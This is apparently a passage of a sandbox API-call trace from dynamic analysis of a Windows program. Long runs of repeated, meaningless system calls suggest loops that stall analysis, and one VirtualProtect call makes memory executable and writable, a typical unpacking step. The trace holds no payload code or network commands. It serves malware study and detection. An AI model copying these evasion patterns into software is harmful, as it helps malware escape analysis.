GetACP () returned 0x4e4 [0079.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.450] GetACP () returned 0x4e4 [0079.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.450] GetACP () returned 0x4e4 [0079.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.450] GetACP () returned 0x4e4 [0079.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.451] GetACP () returned 0x4e4 [0079.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.451] GetACP () returned 0x4e4 [0079.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.451] GetACP () returned 0x4e4 [0079.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.452] GetACP () returned 0x4e4 [0079.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.452] GetACP () returned 0x4e4 [0079.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.452] GetACP () returned 0x4e4 [0079.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.452] GetACP () returned 0x4e4 [0079.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.452] GetACP () returned 0x4e4 [0079.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.453] GetACP () returned 0x4e4 [0079.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.453] GetACP () returned 0x4e4 [0079.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.453] GetACP () returned 0x4e4 [0079.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.453] GetACP () returned 0x4e4 [0079.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.454] GetACP () returned 0x4e4 [0079.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.454] GetACP () returned 0x4e4 [0079.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.454] GetACP () returned 0x4e4 [0079.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.454] GetACP () returned 0x4e4 [0079.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.454] GetACP () returned 0x4e4 [0079.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.455] GetACP () returned 0x4e4 [0079.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.455] GetACP () returned 0x4e4 [0079.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.455] GetACP () returned 0x4e4 [0079.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.455] GetACP () returned 0x4e4 [0079.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.455] GetACP () returned 0x4e4 [0079.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.456] GetACP () returned 0x4e4 [0079.456] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.456] GetACP () returned 0x4e4 [0079.456] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.456] GetACP () returned 0x4e4 [0079.456] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.456] GetACP () returned 0x4e4 [0079.456] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.456] GetACP () returned 0x4e4 [0079.457] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.457] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.457] GetACP () returned 0x4e4 [0079.457] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.457] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.457] GetACP () returned 0x4e4 [0079.457] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.457] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.457] GetACP () returned 0x4e4 [0079.825] VirtualProtect (in: lpAddress=0x235ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0079.826] AddAtomA (lpString=0x0) returned 0x0 [0079.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.826] AddAtomA (lpString=0x0) returned 0x0 [0079.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.826] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.826] AddAtomA (lpString=0x0) returned 0x0 [0079.826] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.827] AddAtomA (lpString=0x0) returned 0x0 [0079.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.827] AddAtomA (lpString=0x0) returned 0x0 [0079.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.827] AddAtomA (lpString=0x0) returned 0x0 [0079.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.827] AddAtomA (lpString=0x0) returned 0x0 [0079.827] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.827] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.828] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.828] AddAtomA (lpString=0x0) returned 0x0 [0079.828] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.829] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.829] AddAtomA (lpString=0x0) returned 0x0 [0079.829] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.830] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.830] AddAtomA (lpString=0x0) returned 0x0 [0079.830] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.831] AddAtomA (lpString=0x0) returned 0x0 [0079.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.831] AddAtomA (lpString=0x0) returned 0x0 [0079.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.831] AddAtomA (lpString=0x0) returned 0x0 [0079.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.831] AddAtomA (lpString=0x0) returned 0x0 [0079.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.831] AddAtomA (lpString=0x0) returned 0x0 [0079.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.831] AddAtomA (lpString=0x0) returned 0x0 [0079.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.832] AddAtomA (lpString=0x0) returned 0x0 [0079.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.832] AddAtomA (lpString=0x0) returned 0x0 [0079.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.832] AddAtomA (lpString=0x0) returned 0x0 [0079.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.832] AddAtomA (lpString=0x0) returned 0x0 [0079.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.832] AddAtomA (lpString=0x0) returned 0x0 [0079.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.832] AddAtomA (lpString=0x0) returned 0x0 [0079.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.832] AddAtomA (lpString=0x0) returned 0x0 [0079.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.833] AddAtomA (lpString=0x0) returned 0x0 [0079.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.833] AddAtomA (lpString=0x0) returned 0x0 [0079.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.833] AddAtomA (lpString=0x0) returned 0x0 [0079.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.833] AddAtomA (lpString=0x0) returned 0x0 [0079.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.833] AddAtomA (lpString=0x0) returned 0x0 [0079.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.833] AddAtomA (lpString=0x0) returned 0x0 [0079.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.834] AddAtomA (lpString=0x0) returned 0x0 [0079.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.834] AddAtomA (lpString=0x0) returned 0x0 [0079.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.834] AddAtomA (lpString=0x0) returned 0x0 [0079.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.834] AddAtomA (lpString=0x0) returned 0x0 [0079.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.834] AddAtomA (lpString=0x0) returned 0x0 [0079.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.834] AddAtomA (lpString=0x0) returned 0x0 [0079.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.835] AddAtomA (lpString=0x0) returned 0x0 [0079.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.835] AddAtomA (lpString=0x0) returned 0x0 [0079.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.835] AddAtomA (lpString=0x0) returned 0x0 [0079.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.835] AddAtomA (lpString=0x0) returned 0x0 [0079.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.835] AddAtomA (lpString=0x0) returned 0x0 [0079.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.836] AddAtomA (lpString=0x0) returned 0x0 [0079.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.836] AddAtomA (lpString=0x0) returned 0x0 [0079.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 